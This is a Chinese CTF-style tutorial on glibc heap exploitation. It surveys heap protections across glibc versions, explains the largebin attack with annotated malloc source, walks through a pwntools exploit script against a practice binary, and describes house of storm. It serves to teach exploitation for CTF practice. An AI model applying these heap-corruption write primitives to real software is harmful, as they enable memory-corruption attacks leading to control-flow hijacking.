各版本glibc的保护手段(从2.23开始只关注重要变化)
这里先简单说一下各个glibc版本的变化,如果没说到的各位师傅可以补充
首先是2.24开了虚表保护,house of orange需要变化才能利用了
然后是2.26有tcache机制
2.27把abort函数中的fflush函数删了,完整的house of orange就此落幕
2.28在tcache里加了key字段防止tcache double free
2.29在unsortedbin里加了检测,unsortedbin落幕
2.30在largebin里加了检测,largebin attack只能写一个地址了
2.32加了safe linking机制,修改fd和bk指针需要有堆地址了
2.35则把hook函数移除了,之后堆的主要攻击就转向IO方向了。
Largebin attack
2.31前的攻击
顾名思义就是利用largebin来进行攻击,这里我贴一下源码(2.31之前),以下注释来自浅析Large_bins_attack在高低版本的利用
while((unsigned long)size < fwd->size){
fwd = fwd->fd_nextsize;
assert ((fwd->size & NON_MAIN_ARENA) == 0);
} //这里检测的是从unsorted_bins里提取出的堆块是否小于large_bins里最近被释放的堆块的大小,如果小于,就将fwd向前移,也就是与比它更小的堆块对比
if ((unsigned long) size == (unsigned long) fwd->size)
/* Always insert in the second position. */
fwd = fwd->fd;//相等的话,就往后排列
else
{
victim->fd_nextsize = fwd; //这里,victim是从unsorted_bin提取出来的堆块,fwd是最近被释放进large_bin的堆块,分别对应我们的p3,p2
victim->bk_nextsize = fwd->bk_nextsize; //在此前,p2->bk_nextsize已经被我们设置为了stack_var2-0x20的地址,所以p3的bk_nextsize指向它
fwd->bk_nextsize = victim; //p2->bk_nextsize指向p3
victim->bk_nextsize->fd_nextsize = victim; //p3->bk_nextsize = stack_var2 - 0x20,也就是说我们已经伪造了一个堆块,(stack_var2-0x20)->fd_nexitsize就是stack_var2的地址,将该地址赋值p3的头指针
}
bck = fwd->bk; //p2的bk我们设置成了stack_var1-0x10,所以bck成了我们stack_var1-0x10这个虚假的chunk这个主要是什么意思呢,就是当unsortedbin的堆块要进入largebin中时,先检测其大小,我们利用的话一般要让进入largebin的堆块大于原有largebin中的堆块,这样就可以进下面这个else分支。因为我们攻击主要是利用这个else分支,我们单独取出来看看(也可以配合注释来看)
[...]
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;#第一个任意写的地方
}
bck = fwd->bk;
[...]
mark_bin (av, victim_index);
victim->bk = bck;#第二个任意写的地方
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
For more details on how large-bins are handled and sorted by ptmalloc,
please check the Background section in the aforementioned link.其实很简单,就是取值,把原堆块结构体里的指针指向新来的堆块,那我们是如何去进行攻击的呢?通过各种手段(uaf,堆溢出)修改已经在largebin的指针,伪造出堆块,修改已经在largebin的堆块的bk,bk_nextsize,把bk修改成目标地址-0x10,把bk_nextsize修改成目标地址-0x20(为什么修改这两个?因为largebin是头插法,所以我们下一个堆块进来时bk指针会改变,因为largebin是从大到小排列,我们进来的堆块比原来的大,所以bk_nextsize的值会变化)修改后就相当于又伪造出了两个堆块(因为没有对此进行检测,所以系统就以为这里有两个堆块,也就有了我们后面的攻击大概就是如图所示),改前:
改后:
这时候我们又有一个堆块想进入largebin,那么因为是头差法,就要找出来这个链表的头,也就是一个个bk遍历过去,在这里也就是这个堆块1(正中间的堆)的bk指针指向的堆块是头,这个堆块的bk指针就要指向新来堆块的堆地址,也就是把bk指针(目标地址-0x10)看成一个堆块的起始地址,我们要取他的bk指针就会对这个地址+0x10,然后就会把其中的值赋上新来堆块的地址;bk_nextsize同理,因为堆是从大到小排列,就要把整个链表的头找出来,也就是对bk_nextsize进行遍历,这个堆块1的bk_nextsize上面就是我们伪造的堆,他的bk_nextsize肯定是没有指向有效的值的,所以就会把堆块1的bk_nextsize指向的假堆看成是链表头,这时候就要取他的bk_nextsize(也就是为什么我们要把bk_nextsize写成目标地址-0x20)因为取头就要+0x20,最终效果如图。
看起来皆大欢喜,这个新来的堆成功进入了largebin的大家族,但其实其中两个家庭成员都是假的,我们的攻击也就此完成了。我们也在实际例子中试试看。来看例题
Polarctf-unk
这个题解法是unlink,不过我们目前不是演示这题怎么解的,只是演示一下unlink,这题有uaf漏洞,还有堆溢出漏洞,got表可写而且还没开pie,还是2.23版本的题,只能说是完美的沙包了。而且函数名也没剔除,感兴趣的话可以去这里下载PolarD&N
演示的脚本如下
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
elf=ELF('./pwn')
#libc = ELF('./libc.so.6')
# libc1=cdll.LoadLibrary('./libc.so.6')
li='./libc.so.6'
flag = 0
if flag:
p = remote('1')
else:
p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s).encode())
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
pay=p64(0)+p64(0)+p64(1)
return pay
def ph(s):
print(hex(s))
def dbg():
# context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
pause()
def add(s,a):
ru(b"choice:")
sdr(1)
ru(b"index:")
sdr(s)
ru(b"size:")
sdr(a)
def free(s):
ru(b"choice:")
sdr(2)
ru(b"index:")
sdr(s)
def edit(s,a,d):
ru(b"choice:")
sdr(3)
ru(b"index:")
sdr(s)
ru(b"length:")
sdr(a)
ru(b"content:")
sd(d)
def show(s):
ru(b"choice:")
sdr(4)
ru(b"index:")
sdr(s)
tar=0x6010C0+0x50
add(0,0x300)#让其他堆能顺利进入largebin的堆
add(5,0x20)#防合并的堆
add(1,0x410)#先进largebin的堆
add(6,0x20)#防合并的堆
add(2,0x420)#后进largebin的堆
add(3,0x20)#防合并的堆
free(0)
free(1)
add(4,0x30)#让堆块1先进largebin
free(2)#让堆块2进入unsortedbin
pay=0x20*b'b'+flat(0,0x401,0,tar+8-0x10,0,tar-0x20)
edit(5,0x70,pay)#修改堆块1的内容(bk,bk_nextsize)
add(5,0x30)#让堆块2进入largebin,达成攻击
dbg()
ti()为什么要堆块0呢?因为unsortedbin的堆块需要在再次申请堆块,遍历后大小合适才会把其中的堆块放入largebin,所以我们就一直申请0x30大小的堆,让堆块0一直被切割,同时触发遍历,把堆块放进largebin。攻击前
攻击后
可以肯定我们成功在堆块链表0x6010C0+0x50的地方写了两个堆块地址,这个堆块地址就是刚进入largebin的堆块地址。
2.31后因为加了检测,所以只能通过bk_nextsize写一个堆块了
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd)) //以上面的p2为例的话,那就是检测stack_var2-0x20的fd_nextsize是否指向p2。是的话就报错
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
if (bck->fd != fwd)// 同理,如果stack_var1-0x10的fd是否指向p2,是就报错
malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");House of storm
这个感觉名字很贴切,确实是storm,非常快速啊,通过一次申请改三个地址,并且直接申请到目标地址。主要利用手法就是先准备好一个unsortedbin中的堆块,再准备一个largebin中的堆块,修改largeQbin的bk,bk_nextsize分别是目标地址+8,目标地址-0x18-5,然后准备一个堆块大小小于largebin中的堆块,但能被放进largebin中的堆块。最后申请指定大小的堆就可以完成攻击了。因为在申请堆的时候在没有tcache时,先遍历unsortedbin,如果没有相同大小的堆就会把unsortedbin的堆放入对应的bin中,这时就会触发unsortedbinattack和largebinattack,这时我们就已经伪造出一个堆了(unsortedbin改的是bk指针,也就是下一个堆块的地址,当我们攻击完成后,这个堆块就符合要求可以申请了),具体的话就是用largebinattack伪造size位与bk指针,unsortedbin伪造fd指针,从而通过检测。具体我没有找到对应的题就不演示了,只能演示一下攻击效果,我这个没有开pie所以堆地址很小写不到size位